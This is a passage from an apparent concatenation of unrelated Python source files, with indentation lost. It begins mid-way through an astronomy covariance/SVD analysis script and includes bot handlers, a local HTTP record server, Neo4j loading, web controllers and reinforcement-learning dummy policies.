blue_stellar_mass_bins[j+1],2)), fontsize=20)
k2, p = nt(np.log10(std_blue_mocks.T[j]), nan_policy="omit")
axs[i, j].text(0.7, 0.7, "{0}".format(np.round(p, 2)),
transform=axs[i, j].transAxes)
for ax in axs.flat:
ax.set(xlabel=r'\boldmath$\log_{10}\ \sigma \left[km/s\right]$')
for ax in axs.flat:
ax.label_outer()
plt.show()
p_red_arr = []
p_blue_arr = []
for idx in range(len(std_red_mocks.T)):
k2, p = nt(np.log10(std_red_mocks.T[idx]), nan_policy="omit")
p_red_arr.append(p)
for idx in range(len(std_blue_mocks.T)):
k2, p = nt(np.log10(std_blue_mocks.T[idx]), nan_policy="omit")
p_blue_arr.append(p)
# * resolve B - neither log nor linear passed null hypothesis of normal dist.
# * eco - log passed null hypothesis
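# Reading these p-values (nt is assumed to be scipy.stats.normaltest): the null
# hypothesis is that the sample comes from a normal distribution, so e.g.
# k2, p = nt(np.log10(std_red_mocks.T[0]), nan_policy="omit")
# consistent_with_normal = p > 0.05 # fail to reject at the 5% level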
################################################################################
### Randomly sample a subset from 64 mocks and measure corr matrix ###
for idx in range(5):
print(idx)
combined_df = get_err_data_mod(survey, path_to_mocks)
# Correlation matrix of phi and deltav colour measurements combined
corr_mat_colour = combined_df.corr()
corr_mat_inv_colour = np.linalg.inv(corr_mat_colour.values)
err_colour = np.sqrt(np.diag(combined_df.cov()))
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
cmap = cm.get_cmap('Spectral')
cax = ax1.matshow(combined_df.corr(), cmap=cmap)
# tick_marks = [i for i in range(len(corr_mat_colour.columns))]
# plt.xticks(tick_marks, corr_mat_colour.columns, rotation='vertical')
# plt.yticks(tick_marks, corr_mat_colour.columns)
plt.gca().invert_yaxis()
plt.gca().xaxis.tick_bottom()
fig1.colorbar(cax)
plt.title(r'Mass function and old and new sigma observables')
plt.savefig('sample_{0}.png'.format(idx+1))
### Testing singular value decomposition ###
from scipy import linalg
num_mocks = 64
used_combined_df = get_err_data(survey, path_to_mocks)
used_corr_mat_colour = used_combined_df.corr()
used_err_colour = np.sqrt(np.diag(used_combined_df.cov()))
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
cmap = cm.get_cmap('Spectral')
cax = ax1.matshow(used_corr_mat_colour, cmap=cmap, vmin=-1, vmax=1)
plt.gca().invert_yaxis()
plt.gca().xaxis.tick_bottom()
fig1.colorbar(cax)
plt.title(r'Original matrix')
plt.show()
## Help from http://www.math.usm.edu/lambers/cos702/cos702_files/docs/PCA.pdf
## Help from https://stats.stackexchange.com/questions/134282/relationship-between-svd-and-pca-how-to-use-svd-to-perform-pca
U, s, Vh = linalg.svd(used_corr_mat_colour) # columns of U are the eigenvectors
eigenvalue_threshold = np.sqrt(np.sqrt(2/num_mocks))
idxs_cut = []
for idx,eigenval in enumerate(s):
if eigenval < eigenvalue_threshold:
idxs_cut.append(idx)
last_idx_to_keep = min(idxs_cut)-1
reconst = np.matrix(U[:, :last_idx_to_keep]) * np.diag(s[:last_idx_to_keep]) * \
np.matrix(Vh[:last_idx_to_keep, :])
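# Rank-k reconstruction sketch: with C = U diag(s) Vh, keeping the first k modes
# gives C_k = U[:, :k] @ diag(s[:k]) @ Vh[:k, :], the closest rank-k
# approximation to C in the least-squares sense (Eckart-Young).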
fig2 = plt.figure()
ax1 = fig2.add_subplot(111)
cmap = cm.get_cmap('Spectral')
cax = ax1.matshow(reconst, cmap=cmap, vmin=-1, vmax=1)
plt.gca().invert_yaxis()
plt.gca().xaxis.tick_bottom()
fig2.colorbar(cax)
plt.title(r'Reconstructed matrix post-SVD')
plt.show()
fig3 = plt.figure()
plt.scatter(np.linspace(1,len(s),len(s)), s, s=120, marker='o',
facecolors='none', edgecolors='mediumorchid', linewidths=3)
plt.plot(np.linspace(1,len(s),len(s)), s, '-k')
plt.hlines(eigenvalue_threshold, 0, 30, ls='--')
plt.xlabel('Component number')
plt.ylabel('Eigenvalue')
plt.show()
## Projecting data onto new orthogonal space
print('Measuring SMF for data')
total_data, red_data, blue_data = measure_all_smf(catl, volume, \
data_bool=True)
print('Measuring spread in vel disp for data')
std_red, old_centers_red, std_blue, old_centers_blue = get_deltav_sigma_data(catl)
print('Measuring binned spread in vel disp for data')
mean_grp_cen_red, new_centers_red, mean_grp_cen_blue, new_centers_blue = \
get_sigma_per_group_data(catl)
full_data_arr = []
full_data_arr = np.insert(full_data_arr, 0, red_data[1])
full_data_arr = np.insert(full_data_arr, len(full_data_arr), blue_data[1])
full_data_arr = np.insert(full_data_arr, len(full_data_arr), std_red)
full_data_arr = np.insert(full_data_arr, len(full_data_arr), std_blue)
full_data_arr = np.insert(full_data_arr, len(full_data_arr), mean_grp_cen_red[0])
full_data_arr = np.insert(full_data_arr, len(full_data_arr), mean_grp_cen_blue[0])
full_data_arr = full_data_arr.reshape(1,30) # shape (N, n): N = # of data vectors, n = # of dims
eigenvector_subset = np.matrix(U[:, :last_idx_to_keep])
full_data_arr_new_space = full_data_arr @ eigenvector_subset
## Projecting simga (error from mocks) onto new orthogonal space
mock_data_df_new_space = pd.DataFrame(used_combined_df @ eigenvector_subset)
err_colour_new_space = np.sqrt(np.diag(mock_data_df_new_space.cov()))
## Plotting post-svd reduced correlation and covariance matrices
corr_mat_colour_new_space = mock_data_df_new_space.corr()
cov_mat_colour_new_space = mock_data_df_new_space.cov()
fig4 = plt.figure()
ax1 = fig4.add_subplot(111)
cmap = cm.get_cmap('Spectral')
cax = ax1.matshow(corr_mat_colour_new_space, cmap=cmap, vmin=-1, vmax=1)
plt.gca().invert_yaxis()
plt.gca().xaxis.tick_bottom()
fig4.colorbar(cax)
plt.title(r'Partial correlation matrix in new orthogonal space')
plt.show()
fig5 = plt.figure()
ax1 = fig5.add_subplot(111)
cmap = cm.get_cmap('Spectral')
cax = ax1.matshow(cov_mat_colour_new_space, cmap=cmap)
plt.gca().invert_yaxis()
plt.gca().xaxis.tick_bottom()
fig5.colorbar(cax)
plt.title(r'Partial covariance matrix in new orthogonal space')
plt.show()
## Plotting post-svd full correlation matrix
full_mock_new_space = pd.DataFrame(used_combined_df @ np.matrix(U))
full_corr_mat_colour_new_space = full_mock_new_space.corr()
fig6 = plt.figure()
ax1 = fig6.add_subplot(111)
cmap = cm.get_cmap('Spectral')
cax = ax1.matshow(full_corr_mat_colour_new_space, cmap=cmap, vmin=-1, vmax=1)
plt.gca().invert_yaxis()
plt.gca().xaxis.tick_bottom()
fig6.colorbar(cax)
plt.title(r'Full correlation matrix in new orthogonal space')
plt.show()
## Testing implementation of using correlation matrix for mass function
## measurements but calculating individual chi-squared measurements for
## rest of the observables
test_data = full_data_arr[0]
test_model = np.random.uniform(size=30) + full_data_arr[0]
test_error = used_err_colour
# Using the correlation matrix ONLY for phi measurements
test_df = used_combined_df[used_combined_df.columns[0:10]]
test_corr_mat_colour = test_df.corr()
test_corr_mat_inv = np.linalg.inv(test_corr_mat_colour.values)
phi_data = test_data[0:10]
phi_model = test_model[0:10]
phi_error = test_error[0:10]
first_term = ((phi_data - phi_model) / (phi_error)).reshape(1,phi_data.size)
third_term = np.transpose(first_term)
# chi_squared is saved as [[value]]
phi_chi_squared = np.dot(np.dot(first_term,test_corr_mat_inv),third_term)[0][0]
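# Equivalently: phi_chi_squared = d^T R^-1 d, with d = (data - model)/err and
# R the correlation matrix restricted to the phi measurements.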
other_data = test_data[10:]
other_model = test_model[10:]
other_error = test_error[10:]
other_chi_squared = np.power(((other_data - other_model)/other_error),2)
total_chi_squared = phi_chi_squared + np.sum(other_chi_squared)
## Testing implementation of using trimmed post-SVD matrix
test_data = full_data_arr[0]
test_model = np.random.uniform(size=30) + full_data_arr[0]
test_df = used_combined_df
corr_mat_colour = test_df.corr()
U, s, Vh = linalg.svd(corr_mat_colour) # columns of U are the eigenvectors
eigenvalue_threshold = np.sqrt(np.sqrt(2/num_mocks))
idxs_cut = []
for idx,eigenval in enumerate(s):
if eigenval < eigenvalue_threshold:
idxs_cut.append(idx)
last_idx_to_keep = min(idxs_cut)-1
eigenvector_subset = np.matrix(U[:, :last_idx_to_keep])
mock_data_df_new_space = pd.DataFrame(test_df @ eigenvector_subset)
test_data_new_space = np.array(np.matrix(test_data) @ eigenvector_subset)[0]
test_model_new_space = np.array(np.matrix(test_model) @ eigenvector_subset)[0]
test_error_new_space = np.sqrt(np.diag(mock_data_df_new_space.cov()))
chi_squared_indiv = np.power(((test_data_new_space - test_model_new_space)/test_error_new_space),2)
total_chi_squared = np.sum(chi_squared_indiv)
################################################################################
# Plotting absolute magnitude vs redshift for eco data with and without buffer #
################################################################################
from cosmo_utils.utils import work_paths as cwpaths
import matplotlib.pyplot as plt
from matplotlib import rc
import pandas as pd
rc('font', **{'family': 'sans-serif', 'sans-serif': ['Helvetica']}, size=20)
rc('text', usetex=True)
rc('axes', linewidth=2)
rc('xtick.major', width=2, size=7)
rc('ytick.major', width=2, size=7)
dict_of_paths = cwpaths.cookiecutter_paths()
path_to_raw = dict_of_paths['raw_dir']
catl_file = path_to_raw + "eco/eco_all.csv"
eco_catl = pd.read_csv(catl_file,delimiter=",", header=0)
eco_nobuff = eco_catl.loc[(eco_catl.cz.values >= 3000) &
(eco_catl.cz.values <= 7000)]
eco_buff = eco_catl.loc[(eco_catl.cz.values >= 2530) &
(eco_catl.cz.values <= 7470)]
plt.scatter(eco_buff.cz.values/(3*10**5), eco_buff.absrmag,
label=r'With buffer (2530 $\leq$ cz $\leq$ 7470)',s=3)
plt.scatter(eco_nobuff.cz.values/(3*10**5), eco_nobuff.absrmag,
label=r'Without buffer (3000 $\leq$ cz $\leq$ 7000)',s=3)
plt.gca().invert_yaxis()
plt.hlines(-17.33, 0.008, 0.025, colors='k', ls='--', label='-17.33', lw=3)
plt.hlines(-17, 0.008, 0.025, colors='gray', ls='--', label='-17', lw=3)
plt.legend(prop={'size': 25})
plt.xlabel(r'\boldmath$z$', fontsize=30)
plt.ylabel(r'\boldmath$M_{r}$', fontsize=30)
plt.show()
|
python
|
# coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from jdcloud_cli.utils import encode
class Printer(object):
@staticmethod
def print_result(resp):
print(encode(json.dumps(resp.__dict__, cls=ErrorEncoder, indent=4, ensure_ascii=False)))
@staticmethod
def print_text(info):
print(info)
class ErrorEncoder(json.JSONEncoder):
def default(self, o):
return o.__dict__
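# Minimal usage sketch; the response object below is hypothetical, any object
# whose __dict__ is JSON-serializable works:
# class FakeResp(object):
#     def __init__(self):
#         self.code = 200
#         self.message = 'ok'
# Printer.print_result(FakeResp())
# Printer.print_text('done')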
|
python
|
A, B, X = map(int, input().split())
print("YES" if 0 <= X-A <= B else "NO")
|
python
|
from content.models import PopularQuestion
from ..loader import dp
from aiogram import types
from ..utils.filters import starts_with
from ..keyboards.inline import generic
from ..utils.helpers import get_message_one_button
@dp.callback_query_handler(starts_with('FAQ_element'))
async def send_faq_carousel(callback_query: types.CallbackQuery):
# data FAQ_element_{element_id}
data = callback_query.data.split('_')
list_elements = list(PopularQuestion.objects.all())
count_elements = len(list_elements)
if count_elements == 0:
text = get_message_one_button('FAQ нет ни одного вопроса') # "FAQ has no questions yet"
markup = generic.inline_button('Назад', 'menu') # "Back"
else:
element_id = int(data[2])
text = make_post(element_id, list_elements)
markup = make_markup(data, count_elements)
await callback_query.message.edit_text(
text=text, reply_markup=markup)
def make_markup(data, count_elements):
element_id = int(data[2])
callback_prefix = 'FAQ_element'
callback_back_button = 'menu'
markup = generic.inline_carousel(
element_id, count_elements, callback_prefix, callback_back_button
)
return markup
def make_post(element_id, list_objects):
question = list_objects[element_id]
text = f'<b>{question.name}</b>\n\n{question.text}'
return text
|
python
|
# Import required libraries
import os # To access environment variables
from dotenv import load_dotenv # To load environment variables from .env file
import serial # To connect via the serial port
import time # To sleep for a few seconds
# Load configuration (e.g. the serial port name) from the .env file
load_dotenv()
# Start reading the serial port
ser = serial.Serial(port = os.environ['SERIAL'],
baudrate = 9600,
write_timeout = 0)
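# Example .env contents (the key SERIAL matches the lookup above; the device
# path is an assumption and depends on the host):
# SERIAL=/dev/ttyUSB0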
while True:
print ("im starting")
temp = '1'
ser.write(temp.encode())
print("write1")
time.sleep(5)
temp = '0'
print("write 0")
ser.write(temp.encode())
print("Starting to print")
ser.write('1'.encode())
print("printing 1")
time.sleep(5)
print("printing 0")
ser.write('0'.encode())
time.sleep(2)
|
python
|
from py2neo import Graph,Node,Relationship,Subgraph
graph = Graph('http://localhost:7474',username='neo4j',password='123456')
tx = graph.begin()
# ### Create
# # Nodes can be created one at a time
# a = Node('Person',name='bubu')
# graph.create(a)
# b = Node('Person',name='kaka')
# graph.create(b)
# r = Relationship(a,'KNOWS',b)
# graph.create(r)
# # They can also be created all at once
# s = a | b | r
# graph.create(s)
opera=[]
data={
'person':[
{'id':'0','name':u'恩比德','height':'2.13','age':'23','team':'76人'},
{'id':'1','name':u'科比','height':'1.96','age':'42','team':'湖人'},
{'id':'2','name':u'詹姆斯','height':'2.03','age':'35','team':'湖人'},
{'id':'3','name':u'韦德','height':'1.93','age':'38','team':'热火'},
{'id':'4','name':u'安东尼','height':'2.03','age':'36','team':'尼克斯'},
{'id':'5','name':u'欧文','height':'1.91','age':'29','team':'篮网'},
{'id':'6','name':u'杜兰特','height':'2.11','age':'32','team':'篮网'},
{'id':'7','name':u'戴维斯','height':'2.10','age':'28','team':'湖人'},
{'id':'8','name':u'乔治','height':'2.06','age':'31','team':'快船'},
{'id':'9','name':u'保罗','height':'1.85','age':'34','team':'雷霆'},
{'id':'10','name':u'伦纳德','height':'2.03','age':'33','team':'快船'},
{'id':'11','name':u'哈登','height':'1.98','age':'33','team':'火箭'},
{'id':'12','name':u'库里','height':'1.91','age':'33','team':'勇士'},
{'id':'13','name':u'汤普森','height':'2.03','age':'32','team':'勇士'},
{'id':'14','name':u'格林','height':'1.98','age':'31','team':'勇士'},
{'id':'15','name':u'维斯布鲁克','height':'1.91','age':'30','team':'火箭'}
],
'team':[
{'id':'0','name':'湖人','location':'洛杉矶'},
{'id':'1','name':'热火','location':'迈阿密'},
{'id':'2','name':'快船','location':'洛杉矶'},
{'id':'3','name':'勇士','location':'金州'},
{'id':'4','name':'火箭','location':'休斯顿'},
{'id':'5','name':'尼克斯','location':'纽约'},
{'id':'6','name':'雷霆','location':'俄克拉马荷'},
{'id':'7','name':'篮网','location':'新泽西'},
{'id':'8','name':'76人','location':'费城'},
],
'mvp':[
{'id':'0','year':'2010'},
{'id':'2','year':'2012'},
{'id':'3','year':'2013'},
{'id':'4','year':'2014'},
{'id':'5','year':'2015'},
{'id':'6','year':'2016'},
{'id':'7','year':'2017'},
{'id':'8','year':'2018'}
],
'fmvp':[
{'id':'0','year':'2010'},
{'id':'2','year':'2012'},
{'id':'3','year':'2013'},
{'id':'4','year':'2014'},
{'id':'5','year':'2015'},
{'id':'6','year':'2016'},
{'id':'7','year':'2017'},
{'id':'8','year':'2018'}
],
'relation':[
['p3','brother','p4'],
['p2','brother','p4'],
['p2','brother','p3'],
['p9','brother','p2'],
['p9','brother','p3'],
['p9','brother','p4'],
['p15','brother','p6'],
['p2','sameboth','p12'],
['p1','teacher','p11'],
['p2','teammate','p7'],
['p1','teammate','p2'],
['p5','teammate','p6'],
['p15','work','t4'],
['p14','work','t3'],
['p13','work','t3'],
['p12','work','t3'],
['p11','work','t4'],
['p10','work','t2'],
['p9','work','t6'],
['p8','work','t2'],
['p7','work','t0'],
['p6','work','t7'],
['p5','work','t7'],
['p4','work','t5'],
['p3','work','t1'],
['p2','work','t0'],
['p1','work','t0'],
['p0','work','t8'],
['m0','grant','p2'],
['m2','grant','p2'],
['m3','grant','p2'],
['m4','grant','p6'],
['m5','grant','p12'],
['m6','grant','p12'],
['m7','grant','p15'],
['m8','grant','p11'],
['f0','grant','p1'],
['f2','grant','p2'],
['f3','grant','p2'],
['f4','grant','p10'],
['f5','grant','p12'],
['f6','grant','p2'],
['f7','grant','p6'],
['f8','grant','p6'],
]
}
person='person'
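# NOTE: at module scope locals() is globals(), so the dynamic assignments below
# create the p*, t*, m* and f* variables referenced later by the relation list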
for i,item in enumerate(data[person]):
locals()["p"+item['id']] = Node(person,name='{}'.format(item['name']),height='{}'.format(item['height']),age='{}'.format(item['age']),team='{}'.format(item['team']))
#locals()["p"+item['id']] = Node(person,name='{}'.format(item['name']))
#graph.create(locals()["p"+item['id']])
opera.append(locals()["p"+item['id']])
team='team'
for i,item in enumerate(data[team]):
locals()["t"+item['id']] = Node(team,name='{}'.format(item['name']),location='{}'.format(item['location']))
#r = Node(person,name='{}'.format(item['name']))
#graph.create(locals()["t"+item['id']])
opera.append(locals()["t"+item['id']])
mvp='mvp'
for i,item in enumerate(data[mvp]):
locals()["m"+item['id']] = Node(mvp,name='{}'.format(item['year']))
#r = Node(person,name='{}'.format(item['name']))
#graph.create(locals()["t"+item['id']])
opera.append(locals()["m"+item['id']])
fmvp='fmvp'
for i,item in enumerate(data[fmvp]):
locals()["f"+item['id']] = Node(fmvp,name='{}'.format(item['year']))
#r = Node(person,name='{}'.format(item['name']))
#graph.create(locals()["t"+item['id']])
opera.append(locals()["f"+item['id']])
rela=[]
relation='relation'
for i,item in enumerate(data[relation]):
r = Relationship(locals()[item[0]],item[1],locals()[item[2]])
#r = Node(person,name='{}'.format(item['name']))
#graph.create(r)
rela.append(r)
### Transaction
opera=Subgraph(opera,relationships=rela)
tx.create(opera)
tx.commit()
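# Optional sanity check against the same local server (assumed reachable):
# print(graph.run("MATCH (n) RETURN count(n) AS total").data())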
|
python
|
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from SocketServer import ThreadingMixIn
import threading
import SocketServer
from tools.tools import is_unsigned_integer
import re
import simplejson
import cgi
# urls:
# - https://docs.python.org/3/glossary.html#term-global-interpreter-lock
# - http://stackoverflow.com/questions/1312331/using-a-global-dictionary-with-threads-in-python
# - http://stackoverflow.com/questions/105095/are-locks-unnecessary-in-multi-threaded-python-code-because-of-the-gil
# - https://docs.python.org/3/library/dis.html#opcode-STORE_SUBSCR
# -> in the end, for operations this short, the Python interpreter is already protected.
class LocalDataWithoutMutex(object):
"""
"""
_records = {}
@staticmethod
def get_record(id_record):
"""
"""
return LocalDataWithoutMutex._records[id_record]
@staticmethod
def set_record(id_record, record_):
"""
"""
LocalDataWithoutMutex._records[id_record] = record_
class LocalDataWithMutex(object):
"""
"""
_lock = threading.Lock()
_records = {}
@staticmethod
def get_record(id_record):
"""
Mutex safe (static) method to get a record
:param id_record:
:return:
"""
with LocalDataWithMutex._lock:
record = LocalDataWithMutex._records[id_record]
return record
@staticmethod
def set_record(id_record, record_):
"""
Mutex safe (static) method to set a record
"""
with LocalDataWithMutex._lock:
LocalDataWithMutex._records[id_record] = record_
LocalData = LocalDataWithoutMutex
# LocalData = LocalDataWithMutex
class HTTPRequestHandler(BaseHTTPRequestHandler, object):
"""
"""
@staticmethod
def get_suffix(prefix, path):
"""
:param prefix:
:param path:
:return:
"""
# urls:
# - https://docs.python.org/2/library/re.html
# - http://stackoverflow.com/questions/12572362/get-a-string-after-a-specific-substring
m = re.search('(?:'+prefix+')(.*)', path)
return m.group(1)
@staticmethod
def get_path_for_POST():
"""
:return:
"""
return 'api/v1/addrecord/'
@staticmethod
def get_path_for_GET():
"""
:return:
"""
return 'api/v1/getrecord/'
@staticmethod
def get_pattern_for_POST():
return HTTPRequestHandler.get_path_for_POST() + '*'
@staticmethod
def get_pattern_for_GET():
return HTTPRequestHandler.get_path_for_GET() + '*'
def _send_response_with_end_headers(self, status_code, msg=None):
"""
:param status_code:
:param msg:
:return:
"""
self.send_response(status_code, msg)
self.send_header('Content-Type', 'application/json')
self.end_headers()
def do_POST(self):
"""
:return:
"""
pattern_for_POST = self.get_pattern_for_POST()
if re.search(pattern_for_POST, self.path) is not None:
ctype, pdict = cgi.parse_header(self.headers.getheader('content-type'))
if ctype == 'application/json':
length = int(self.headers.getheader('content-length'))
data = self.rfile.read(length)
# url: http://stackoverflow.com/questions/31371166/reading-json-from-simplehttpserver-post-data
data_json = simplejson.loads(data)
recordID = self.get_suffix(self.get_path_for_POST(), self.path)
LocalData.set_record(recordID, data_json)
self._send_response_with_end_headers(200)
else:
self._send_response_with_end_headers(400, 'Bad Request: support only application/json')
else:
self._send_response_with_end_headers(403,
'Bad Request: wrong path, support only "/api/v1/addrecord/*" for posting')
return
def do_GET(self):
"""
:return:
"""
pattern_for_GET = self.get_pattern_for_GET()
if re.search(pattern_for_GET, self.path) is not None:
recordID = self.get_suffix(self.get_path_for_GET(), self.path)
try:
record = LocalData.get_record(recordID)
self._send_response_with_end_headers(200)
self.wfile.write(simplejson.dumps(record))
except KeyError:
self._send_response_with_end_headers(401, "Bad Request: no record for this id")
else:
self._send_response_with_end_headers(403, 'Bad Request: wrong path, support only "/api/v1/getrecord/*" for getting')
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""
"""
allow_reuse_address = True
def shutdown(self):
"""
:return:
"""
self.socket.close()
HTTPServer.shutdown(self)
# urls:
# - http://stackoverflow.com/questions/598077/why-does-foo-setter-in-python-not-work-for-me
# - http://stackoverflow.com/a/598090
class SimpleHTTPServer(object):
"""
"""
class SocketError(SocketServer.socket.error):
"""
"""
def __init__(self, message, *args):
"""
:param message:
:param args:
:return:
"""
self.message = message
super(SimpleHTTPServer.SocketError, self).__init__(message, *args)
# url: http://stackoverflow.com/questions/1319615/proper-way-to-declare-custom-exceptions-in-modern-python
class StartError(Exception):
def __init__(self, message, errors):
"""
:param message:
:param errors:
:return:
"""
# Call the base class constructor with the parameters it needs
super(SimpleHTTPServer.StartError, self).__init__(message)
# Now for your custom code...
self.errors = errors
def __init__(self, ip="127.0.0.1", port=8080):
"""
:param ip:
:param port:
:return:
"""
if isinstance(ip, str) and is_unsigned_integer(port):
self._ip = ip
self._port = port
#
self.server_thread = None
self.server = None
#
self._thread_name = ""
else:
raise ValueError
# url: http://stackoverflow.com/questions/2627002/whats-the-pythonic-way-to-use-getters-and-setters
@property
def ip(self):
"""
:return:
"""
return self._ip
@property
def port(self):
"""
:return:
"""
return self._port
@property
def thread_name(self):
"""
:return:
:rtype: str
"""
return self._thread_name
@thread_name.setter
def thread_name(self, value):
"""
:param value:
"""
self._thread_name = value
def acquire(self, class_handler=HTTPRequestHandler):
"""
url: http://stackoverflow.com/questions/19071512/socket-error-errno-48-address-already-in-use
:param class_handler:
"""
try:
self.server = ThreadedHTTPServer((self.ip, self.port), class_handler)
except SocketServer.socket.error, e:
raise SimpleHTTPServer.SocketError(e)
def start(self, thread_name="httpserver_thread"):
"""
:return:
"""
try:
self._thread_name = thread_name
self.server_thread = threading.Thread(target=self.server.serve_forever, name=self._thread_name)
self.server_thread.daemon = True
self.server_thread.start()
except Exception, e:
raise self.StartError("", e)
def wait_for_thread(self):
"""
:return:
"""
self.server_thread.join()
def stop(self):
"""
:return:
"""
self.server.shutdown()
self.wait_for_thread()
if __name__ == '__main__':
server = SimpleHTTPServer("127.0.0.1", 8081)
server.start()
server.wait_for_thread()
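# Example interaction, assuming the server above is running on 127.0.0.1:8081:
# curl -X POST -H "Content-Type: application/json" \
#      -d '{"value": 42}' http://127.0.0.1:8081/api/v1/addrecord/foo
# curl http://127.0.0.1:8081/api/v1/getrecord/foo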
|
python
|
import re
def formatString(input):
# Collapse runs of whitespace into single spaces
input = re.sub(r"\s+", " ", input)
# Trim a leading/trailing space left over from the substitution
if input and " " == input[0]:
input = input[1:]
if input and " " == input[-1]:
input = input[:-1]
return input
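# Example: formatString("  foo   bar ") returns "foo bar".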
|
python
|
# Copyright 2015 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Controllers for the Oppia collection learner view."""
from __future__ import absolute_import
from __future__ import unicode_literals
from core import feconf
from core import utils
from core.controllers import acl_decorators
from core.controllers import base
from core.domain import rights_manager
from core.domain import summary_services
class CollectionPage(base.BaseHandler):
"""Page describing a single collection."""
URL_PATH_ARGS_SCHEMAS = {
'collection_id': {
'schema': {
'type': 'basestring'
}
}
}
HANDLER_ARGS_SCHEMAS = {
'GET': {}
}
@acl_decorators.can_play_collection
def get(self, _):
"""Handles GET requests."""
self.render_template('collection-player-page.mainpage.html')
class CollectionDataHandler(base.BaseHandler):
"""Provides the data for a single collection."""
GET_HANDLER_ERROR_RETURN_TYPE = feconf.HANDLER_TYPE_JSON
URL_PATH_ARGS_SCHEMAS = {
'collection_id': {
'schema': {
'type': 'basestring'
}
}
}
HANDLER_ARGS_SCHEMAS = {
'GET': {}
}
@acl_decorators.can_play_collection
def get(self, collection_id):
"""Populates the data on the individual collection page."""
collection_dict = (
summary_services.get_learner_collection_dict_by_id(
collection_id, self.user,
allow_invalid_explorations=False))
collection_rights = rights_manager.get_collection_rights(
collection_id, strict=False)
self.values.update({
'can_edit': rights_manager.check_can_edit_activity(
self.user, collection_rights),
'collection': collection_dict,
'is_logged_in': bool(self.user_id),
'session_id': utils.generate_new_session_id(),
'meta_name': collection_dict['title'],
'meta_description': utils.capitalize_string(
collection_dict['objective'])
})
self.render_json(self.values)
|
python
|
import scrapy.http.response
class CacheResponse(scrapy.http.response.Response):
is_cache = False
def mark_cache(self):
self.is_cache = True
return self
def judge_cache(self):
if not hasattr(self, 'is_cache'):
return False
return self.is_cache
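# Minimal sketch of intended use (the cache-restore hook is an assumption): cast
# a response restored from cache to CacheResponse and mark it, so downstream
# code can branch on judge_cache():
# response.__class__ = CacheResponse
# response.mark_cache()
# if response.judge_cache():
#     pass # e.g. skip re-download bookkeeping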
|
python
|
from django.core.management.base import BaseCommand, CommandError
from coinhub import pullData as myModel
# Run via cron job similar to the form shown below
# * * * * * python manage.py data_grabber --url https://api.coinmarketcap.com/v1/ticker/
class Command(BaseCommand):
help = 'Collects data from an exchange'
def add_arguments(self, parser):
parser.add_argument('--url', type=str)
def handle(self, *args, **options):
exchange_url = options['url']
my_puller = myModel.CoinDataPuller(exchange_url)
my_puller.collect_new_data()
my_puller.save()
|
python
|
import settings
import shutil
def make_cbz():
shutil.make_archive('comic','zip',root_dir=settings.IMAGES_PATH)
shutil.move('comic.zip','comic.cbz')
if __name__ == "__main__":
make_cbz()
|
python
|
from __future__ import absolute_import
from struct import unpack
from vertica_python.vertica.messages.message import BackendMessage
class ParameterStatus(BackendMessage):
def __init__(self, data):
null_byte = data.find('\x00')
# body is name\x00value\x00: name spans null_byte bytes, value fills the rest
unpacked = unpack('{0}sx{1}sx'.format(null_byte, len(data) - null_byte - 2), data)
self.name = unpacked[0]
self.value = unpacked[1]
ParameterStatus._message_id('S')
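# Wire-format sketch (assumed): the message body is b'name\x00value\x00', e.g.
# b'server_version\x009.1.1\x00' -> name='server_version', value='9.1.1'.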
|
python
|
import torch as to
from torch.distributions.uniform import Uniform
from pyrado.policies.base import Policy
from pyrado.policies.base_recurrent import RecurrentPolicy
from pyrado.utils.data_types import EnvSpec
class IdlePolicy(Policy):
""" The most simple policy which simply does nothing """
name: str = 'idle'
def __init__(self, spec: EnvSpec, use_cuda: bool = False):
"""
Constructor
:param spec: environment specification
:param use_cuda: `True` to move the policy to the GPU, `False` (default) to use the CPU
"""
super().__init__(spec, use_cuda)
def init_param(self, init_values: to.Tensor = None, **kwargs):
pass
def forward(self, obs: to.Tensor = None) -> to.Tensor:
# Observations are ignored
return to.zeros(self._env_spec.act_space.shape)
class DummyPolicy(Policy):
""" Simple policy which samples random values form the action space """
name: str = 'dummy'
def __init__(self, spec: EnvSpec, use_cuda: bool = False):
"""
Constructor
:param spec: environment specification
:param use_cuda: `True` to move the policy to the GPU, `False` (default) to use the CPU
"""
super().__init__(spec, use_cuda)
low = to.from_numpy(spec.act_space.bound_lo)
high = to.from_numpy(spec.act_space.bound_up)
self._distr = Uniform(low, high)
def init_param(self, init_values: to.Tensor = None, **kwargs):
pass
def forward(self, obs: to.Tensor = None) -> to.Tensor:
# Observations are ignored
return self._distr.sample()
class RecurrentDummyPolicy(RecurrentPolicy):
"""
Simple recurrent policy which samples random values from the action space and
always returns hidden states with value zero
"""
name: str = 'rec_dummy'
def __init__(self, spec: EnvSpec, hidden_size: int, use_cuda: bool = False):
"""
Constructor
:param spec: environment specification
:param hidden_size: size of the mimic hidden layer
:param use_cuda: `True` to move the policy to the GPU, `False` (default) to use the CPU
"""
super().__init__(spec, use_cuda)
low = to.from_numpy(spec.act_space.bound_lo)
high = to.from_numpy(spec.act_space.bound_up)
self._distr = Uniform(low, high)
self._hidden_size = hidden_size
@property
def hidden_size(self) -> int:
return self._hidden_size
def init_param(self, init_values: to.Tensor = None, **kwargs):
pass
def forward(self, obs: to.Tensor = None, hidden: to.Tensor = None) -> (to.Tensor, to.Tensor):
# Observations and hidden states are ignored
return self._distr.sample(), to.zeros(self._hidden_size)
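# Minimal usage sketch (EnvSpec construction is assumed; the spaces come from
# an environment):
# spec = EnvSpec(obs_space=env.obs_space, act_space=env.act_space)
# pol = DummyPolicy(spec)
# act = pol(to.zeros(spec.obs_space.shape)) # random action within bounds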
|
python
|
#!/usr/bin/env python
